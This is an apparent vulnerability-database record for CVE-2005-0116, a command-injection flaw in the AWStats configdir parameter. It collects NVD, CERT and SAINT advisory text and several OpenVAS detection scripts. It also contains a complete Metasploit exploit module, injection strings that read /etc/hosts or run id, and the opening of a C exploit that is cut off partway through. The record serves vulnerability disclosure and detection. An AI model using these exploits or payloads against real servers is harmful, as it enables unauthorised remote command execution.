{"cve": [{"lastseen": "2020-12-09T19:22:18", "description": "AWStats 6.1, and other versions before 6.3, allows remote attackers to execute arbitrary commands via shell metacharacters in the configdir parameter to awstats.pl.", "edition": 5, "cvss3": {}, "published": "2005-01-18T05:00:00", "title": "CVE-2005-0116", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2005-0116"], "modified": "2008-09-05T20:45:00", "cpe": ["cpe:/a:awstats:awstats:6.3"], "id": "CVE-2005-0116", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0116", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:awstats:awstats:6.3:*:*:*:*:*:*:*"]}], "saint": [{"lastseen": "2016-10-03T15:01:57", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0116"], "description": "Added: 02/14/2006 \nCVE: [CVE-2005-0116](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0116>) \nBID: [12298](<http://www.securityfocus.com/bid/12298>) \nOSVDB: [13002](<http://www.osvdb.org/13002>) \n\n\n### Background\n\n[AWStats](<http://awstats.sourceforge.net>) is a web application for showing web, FTP, and mail server statistics. \n\n### Problem\n\nInsufficient validation of the `**configdir**` parameter before being used in a PERL open call leads to remote command execution. \n\n### Resolution\n\nUpgrade to [AWStats](<http://awstats.sourceforge.net>) 6.3 or higher. 
\n\n### References\n\n[http://www.idefense.com/intelligence/vulnerabilities/display.php?id=185&type=vulnerabilities](<http://www.idefense.com/intelligence/vulnerabilities/display.php?id=185&type=vulnerabilities>) \n\n\n### Limitations\n\nExploit works on AWStats 6.2 on Linux. \n\n", "edition": 1, "modified": "2006-02-14T00:00:00", "published": "2006-02-14T00:00:00", "id": "SAINT:20A37B06255E4482165348149D6B457C", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/awstats_configdir", "type": "saint", "title": "AWStats configdir parameter command execution", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-06-04T23:19:32", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0116"], "description": "Added: 02/14/2006 \nCVE: [CVE-2005-0116](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0116>) \nBID: [12298](<http://www.securityfocus.com/bid/12298>) \nOSVDB: [13002](<http://www.osvdb.org/13002>) \n\n\n### Background\n\n[AWStats](<http://awstats.sourceforge.net>) is a web application for showing web, FTP, and mail server statistics. \n\n### Problem\n\nInsufficient validation of the `**configdir**` parameter before being used in a PERL open call leads to remote command execution. \n\n### Resolution\n\nUpgrade to [AWStats](<http://awstats.sourceforge.net>) 6.3 or higher. \n\n### References\n\n[http://www.idefense.com/intelligence/vulnerabilities/display.php?id=185&type=vulnerabilities](<http://www.idefense.com/intelligence/vulnerabilities/display.php?id=185&type=vulnerabilities>) \n\n\n### Limitations\n\nExploit works on AWStats 6.2 on Linux. 
\n\n", "edition": 4, "modified": "2006-02-14T00:00:00", "published": "2006-02-14T00:00:00", "id": "SAINT:7BE0E3254D8CF4455737A7AE1BA4F5F2", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/awstats_configdir", "title": "AWStats configdir parameter command execution", "type": "saint", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T17:19:52", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0116"], "edition": 2, "description": "Added: 02/14/2006 \nCVE: [CVE-2005-0116](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0116>) \nBID: [12298](<http://www.securityfocus.com/bid/12298>) \nOSVDB: [13002](<http://www.osvdb.org/13002>) \n\n\n### Background\n\n[AWStats](<http://awstats.sourceforge.net>) is a web application for showing web, FTP, and mail server statistics. \n\n### Problem\n\nInsufficient validation of the `**configdir**` parameter before being used in a PERL open call leads to remote command execution. \n\n### Resolution\n\nUpgrade to [AWStats](<http://awstats.sourceforge.net>) 6.3 or higher. \n\n### References\n\n[http://www.idefense.com/intelligence/vulnerabilities/display.php?id=185&type=vulnerabilities](<http://www.idefense.com/intelligence/vulnerabilities/display.php?id=185&type=vulnerabilities>) \n\n\n### Limitations\n\nExploit works on AWStats 6.2 on Linux. 
\n\n", "modified": "2006-02-14T00:00:00", "published": "2006-02-14T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/awstats_configdir", "id": "SAINT:360F60468A59D80DCB80536A374F945B", "type": "saint", "title": "AWStats configdir parameter command execution", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:18:52", "description": "", "published": "2009-10-30T00:00:00", "type": "packetstorm", "title": "AWStats configdir Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0116"], "modified": "2009-10-30T00:00:00", "id": "PACKETSTORM:82351", "href": "https://packetstormsecurity.com/files/82351/AWStats-configdir-Remote-Command-Execution.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'AWStats configdir Remote Command Execution', \n'Description' => %q{ \nThis module exploits an arbitrary command execution vulnerability in the \nAWStats CGI script. iDEFENSE has confirmed that AWStats versions 6.1 and 6.2 \nare vulnerable. 
\n}, \n'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>', 'hdm' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n['CVE', '2005-0116'], \n['OSVDB', '13002'], \n['BID', '12298'], \n['URL', 'http://www.idefense.com/application/poi/display?id=185&type=vulnerabilities'], \n], \n'Privileged' => false, \n'Payload' => \n{ \n'DisableNops' => true, \n'Space' => 512, \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic perl ruby bash telnet', \n} \n}, \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Targets' => [[ 'Automatic', { }]], \n'DisclosureDate' => 'Jan 15 2005', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('URI', [true, \"The full URI path to awstats.pl\", \"/cgi-bin/awstats.pl\"]), \n], self.class) \nend \n \ndef check \nres = send_request_cgi({ \n'uri' => datastore['URI'], \n'vars_get' => \n{ \n'configdir' => '|echo;cat /etc/hosts;echo|' \n} \n}, 25) \n \nif (res and res.body.match(/localhost/)) \nreturn Exploit::CheckCode::Vulnerable \nend \n \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \ncommand = Rex::Text.uri_encode(payload.encoded) \nurlconfigdir = datastore['URI'] + \"?configdir=|echo;echo%20YYY;#{command};echo%20YYY;echo|\" \n \nres = send_request_raw({ \n'uri' => urlconfigdir, \n'method' => 'GET', \n'headers' => \n{ \n'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', \n'Connection' => 'Close', \n} \n}, 25) \n \nif (res) \nprint_status(\"The server returned: #{res.code} #{res.message}\") \n \nm = res.body.match(/YYY\\n(.*)\\nYYY/m) \n \nif (m) \nprint_status(\"Command output from the server:\") \nprint(\"\\n\" + m[1] + \"\\n\\n\") \nelse \nprint_status(\"This server may not be vulnerable\") \nend \nelse \nprint_status(\"No response from the server\") \nend \nend \n \nend \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": 
"https://packetstormsecurity.com/files/download/82351/awstats_configdir_exec.rb.txt"}], "openvas": [{"lastseen": "2017-07-02T21:10:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-0116"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-09-15T00:00:00", "published": "2008-09-04T00:00:00", "id": "OPENVAS:52229", "href": "http://plugins.openvas.org/nasl.php?oid=52229", "type": "openvas", "title": "FreeBSD Ports: awstats", "sourceData": "#\n#VID 0f5a2b4d-694b-11d9-a9e7-0001020eed82\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: awstats\n\nCVE-2005-0116\nAWStats 6.1, and other versions before 6.3, allows remote attackers to\nexecute arbitrary commands via shell metacharacters in the configdir\nparameter.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://awstats.sourceforge.net/docs/awstats_changelog.txt\nhttp://www.idefense.com/application/poi/display?id=185&type=vulnerabilities&flashstatus=false\nhttp://marc.theaimsgroup.com/?l=full-disclosure&m=110600949323439\nhttp://www.vuxml.org/freebsd/0f5a2b4d-694b-11d9-a9e7-0001020eed82.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(52229);\n script_version(\"$Revision: 4075 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-15 15:13:05 +0200 (Thu, 15 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2005-0116\");\n script_bugtraq_id(12270);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"FreeBSD Ports: awstats\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"awstats\");\nif(!isnull(bver) && revcomp(a:bver, b:\"6.3\")<0) {\n txt += 'Package awstats version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:31:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-0116"], "description": "The remote host is running AWStats, a free real-time logfile analyzer.\n\n The remote version of this software is prone to an input validation\n vulnerability.\n\n The issue is reported to exist because user supplied ", "modified": "2018-05-09T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:136141256231016189", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231016189", "type": "openvas", "title": "AWStats configdir parameter arbitrary cmd exec", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: awstats_configdir.nasl 9788 2018-05-09 15:53:43Z cfischer $\n#\n# AWStats configdir parameter arbitrary cmd exec\n#\n# Authors:\n# David Maciejak <david dot maciejak at kyxar dot fr>\n#\n# Copyright:\n# Copyright (C) 2005 David Maciejak\n#\n# This program is free 
software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:awstats:awstats\";\n\n# Ref: iDEFENSE\n# changes by rd: changed the web request\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.16189\");\n script_version(\"$Revision: 9788 $\");\n script_cve_id(\"CVE-2005-0116\");\n script_bugtraq_id(12270, 12298);\n script_tag(name:\"last_modification\", value:\"$Date: 2018-05-09 17:53:43 +0200 (Wed, 09 May 2018) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"AWStats configdir parameter arbitrary cmd exec\");\n script_category(ACT_ATTACK);\n script_copyright(\"This script is Copyright (C) 2005 David Maciejak\");\n script_family(\"Web application abuses\");\n script_dependencies(\"awstats_detect.nasl\");\n script_mandatory_keys(\"awstats/installed\");\n\n script_tag(name:\"summary\", value:\"The remote host is running AWStats, a free real-time logfile analyzer.\n\n The remote version of this software is prone to an input validation\n vulnerability.\n\n The issue is reported to exist because user supplied 'configdir' URI data passed\n to the 'awstats.pl' script is not sanitized.\");\n\n script_tag(name:\"impact\", 
value:\"An attacker may exploit this condition to execute commands remotely or disclose\n contents of web server readable files.\");\n\n script_tag(name:\"solution\", value:\"Upgrade at least to version 6.3 of this software.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! dir = get_app_location( cpe:CPE, port:port ) ) exit( 0 );\n\nhttp_check_remote_code (\n unique_dir:dir,\n extra_check:\"Check config file, permissions and AWStats documentation\",\n check_request:\"/awstats.pl?configdir=|echo%20Content-Type:%20text/html;%20echo%20;id|%00\",\n check_result:\"uid=[0-9]+.*gid=[0-9]+.*\",\n command:\"id\",\n port:port\n );\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:50:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-0116", "CVE-2005-0363"], "description": "The remote host is missing an update to awstats\nannounced via advisory DSA 682-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:53512", "href": "http://plugins.openvas.org/nasl.php?oid=53512", "type": "openvas", "title": "Debian Security Advisory DSA 682-1 (awstats)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_682_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 682-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"In addition to CVE-2005-0116 more vulnerabilities have been found in\nawstats, a powerful and featureful web server log analyzer with a CGI\nfrontend. 
Missing input sanitising can cause arbitrary commands to be\nexecuted.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 4.0-0.woody.2.\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion 6.2-1.2.\n\nWe recommend that you upgrade your awstats package.\";\ntag_summary = \"The remote host is missing an update to awstats\nannounced via advisory DSA 682-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20682-1\";\n\nif(description)\n{\n script_id(53512);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:56:38 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2005-0363\", \"CVE-2005-0116\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 682-1 (awstats)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"awstats\", ver:\"4.0-0.woody.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:49:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-0362", "CVE-2005-0116", "CVE-2005-0363"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200501-36.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:54822", "href": "http://plugins.openvas.org/nasl.php?oid=54822", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200501-36 (awstats)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"AWStats fails to validate certain input, which could lead to the remote\nexecution of arbitrary code or to the leak of information.\";\ntag_solution = \"All AWStats users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-www/awstats-6.3-r2'\n\nNote: Users with the vhosts USE flag set should manually use webapp-config\nto finalize the update.\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200501-36\nhttp://bugs.gentoo.org/show_bug.cgi?id=77963\nhttp://bugs.gentoo.org/show_bug.cgi?id=81775\nhttp://awstats.sourceforge.net/docs/awstats_changelog.txt\nhttp://www.idefense.com/application/poi/display?id=185\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200501-36.\";\n\n \n\nif(description)\n{\n script_id(54822);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2005-0116\", \"CVE-2005-0362\", \"CVE-2005-0363\");\n 
script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200501-36 (awstats)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-www/awstats\", unaffected: make_list(\"ge 6.3-r2\"), vulnerable: make_list(\"lt 6.3-r2\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cert": [{"lastseen": "2020-09-18T20:43:29", "bulletinFamily": "info", "cvelist": ["CVE-2005-0116"], "description": "### Overview \n\nA lack of input validation in AWStats may allow a remote attacker to execute arbitrary commands.\n\n### Description \n\nAWStats is a Perl CGI script that collects and graphically displays statistics from web, FTP, and mail servers. The `configdir` parameter, within the awstats.pl Perl script, is supplied user-controlled data and then passed as a parameter to the Perl routine `open()`. A lack of input validation on the `configdir` parameter may allow an attacker to compromise a vulnerable server. 
If an attacker supplies this parameter with arbitrary commands prefixed with the '|' character, those commands will be executed on the server.\n\nPlease note that according to public reports, this vulnerability is being actively exploited. \n \n--- \n \n### Impact \n\nIf a remote attacker supplies AWStats with specially crafted input, that attacker may be able to execute arbitrary commands with the privileges of the attacked server process, in most cases user `nobody`. \n \n--- \n \n### Solution \n\n**Upgrade** \n \nThis issue has been corrected in [AWStats version 6.3](<http://awstats.sourceforge.net/#DOWNLOAD>). Users are strongly encouraged to upgrade to this version. \n \n--- \n \n### Vendor Information\n\n272296\n\n### AWStats Affected\n\nUpdated: February 10, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nAccording to [AWStats website](<http://awstats.sourceforge.net/>): \n\n \n_Warning, a security hole was recently found in AWStats versions from 5.0 to 6.2 when AWStats is used as a CGI: A remote user can execute arbitrary commands on your server using permissions of your web server user (in most cases user \"nobody\"). If you use AWStats with another version or with option AllowToUpdateStatsFromBrowser to 0, you are safe. If not, it is highly recommended to update to 6.3 version that fixes this security hole. 
_\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23272296 Feedback>).\n\n### References \n\n * <http://awstats.sourceforge.net/docs/awstats_changelog.txt>\n * [http://www.idefense.com/application/poi/display?id=185&type=vulnerabilities](<http://www.idefense.com/application/poi/display?id=185&type=vulnerabilities>)\n * <http://secunia.com/advisories/13893/>\n\n### Acknowledgements\n\nThis vulnerability was reported by iDEFENSE.\n\nThis document was written by Jeff Gennari.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2005-0116](<http://web.nvd.nist.gov/vuln/detail/CVE-2005-0116>) \n---|--- \n**Severity Metric:** | 13.39 \n**Date Public:** | 2005-01-18 \n**Date First Published:** | 2005-02-10 \n**Date Last Updated:** | 2005-02-21 16:39 UTC \n**Document Revision:** | 44 \n", "modified": "2005-02-21T16:39:00", "published": "2005-02-10T00:00:00", "id": "VU:272296", "href": "https://www.kb.cert.org/vuls/id/272296", "type": "cert", "title": "AWStats fails to properly filter user-supplied input", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-01-31T12:49:53", "description": "AWStats configdir Remote Command Execution Exploit (c code). CVE-2005-0116. Webapps exploit for cgi platform", "published": "2005-01-25T00:00:00", "type": "exploitdb", "title": "AWStats 6.0-6.2 configdir Remote Command Execution Exploit c code", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0116"], "modified": "2005-01-25T00:00:00", "id": "EDB-ID:772", "href": "https://www.exploit-db.com/exploits/772/", "sourceData": " /*\r\nAwStats exploit by Thunder, molnar_rcs@yahoo.com\r\n\r\nThis exploit makes use of the remote command execution bug discovered in\r\nAwStats ver 6.2 and below. 
The bug resides in the awstats.pl perl script.\r\nThe script does not sanitise correctly the user input for the\r\n`configdir` parameter. If the user sends a command prefixed and postfixed\r\nwith | , the command will be executed. An example would be:\r\n\r\nLet's execute '/usr/bin/w':\r\n>\r\nhttp://localhost/cgi-bin/awstats.pl?configdir=%20|%20/usr/bin/w%20|%20\r\n<\r\n\r\nAwstat output:\r\n>\r\nError: LogFile parameter is not defined in config/domain file\r\nSetup (' | /usr/bin/w | /awstats.localhost.conf' file, web server or permissions) may be wrong.\r\nCheck config file, permissions and AWStats documentation (in 'docs' directory).\r\n<\r\n\r\nThat's it. Our command was executed.\r\nThis bug is fixed in AwStats ver 6.3 and a patch was released for all versions, but vulnerable\r\nAwStat is still available for download on several sites (ex. www.topshareware.com).\r\n\r\nType `gcc awexpl.c -o awexpl` to compile the exploit and `./awexpl -u` for usage.\r\n\r\nNote:\r\nJust indexing the commands with | will not always work, or might not work at all. I checked\r\nit on my own awstats 6.0 install, and it failed. So, whoever tried the same on his own\r\nscript and was surprised to see that (although the version he uses is said to be prone to the\r\nremote command execution bug) nothing happened, should patch or upgrade to Awstat 6.3 asap.\r\nAs far as I know all unpatched versions prior to 6.3 are vulnerable and commands prefixed and\r\npostfixed by a | character WILL be executed. 
Beware!\r\n\r\nOh, I almost forgot, the disclaimer :)\r\n\r\nTHIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED \"AS IS\"\r\nAND WITHOUT ANY WARRANTY.\r\n\r\nRobert Molnar,\r\n21st Jan 2005\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n//#include <unistd.h>\r\n#include <arpa/inet.h>\r\n#include <string.h>\r\n\r\nvoid usage(char *pname)\r\n{\r\nprintf(\"# AWStats exploit by Thunder, molnar_rcs@yahoo.com\\n\"\r\n\"# Usage: %s -h <host> -i <ip> [-s Script] [-p Path] [-o Port] [-c Commands] [-u]\\n\"\r\n\"\\t-h : target host name, default is `localhost`\\n\"\r\n\"\\t-i : target IP (to which host name resolves)\\n\"\r\n\"\\t-s : script name, default is `awstats.pl`\\n\"\r\n\"\\t-p : script path, default is `/cgi-bin`\\n\"\r\n\"\\t-o : specify port to connect to, default is `80`\\n\"\r\n\"\\t-c : specify commands to be executed, the exploit will create a\\n\"\r\n\"\\t : file named `OWNED` in `/tmp` by default\\n\"\r\n\"\\t-u : usage\\n\\n\"\r\n\"# Example: %s -h localhost -i 127.0.0.1\\n\"\r\n\"# : %s -h localhost -i 127.0.0.1 -p /~user/cgi-bin\\n\"\r\n\"# : %s -h localhost -i 127.0.0.1 -p /~user/cgi-bin -c \\\"/usr/bin/id\\\"\\n\"\r\n, pname, pname, pname, pname);\r\n\r\nexit(0);\r\n}\r\n\r\nchar * urlEncode(char *inC)\r\n{\r\nint c, i, j = 0;\r\nchar *h = \"0123456789abcdef\";\r\nchar retval[1024], res[3072];\r\nmemcpy(retval, inC, strlen(inC));\r\nretval[strlen(inC)] = '\\0';\r\nfor(i=0; i < 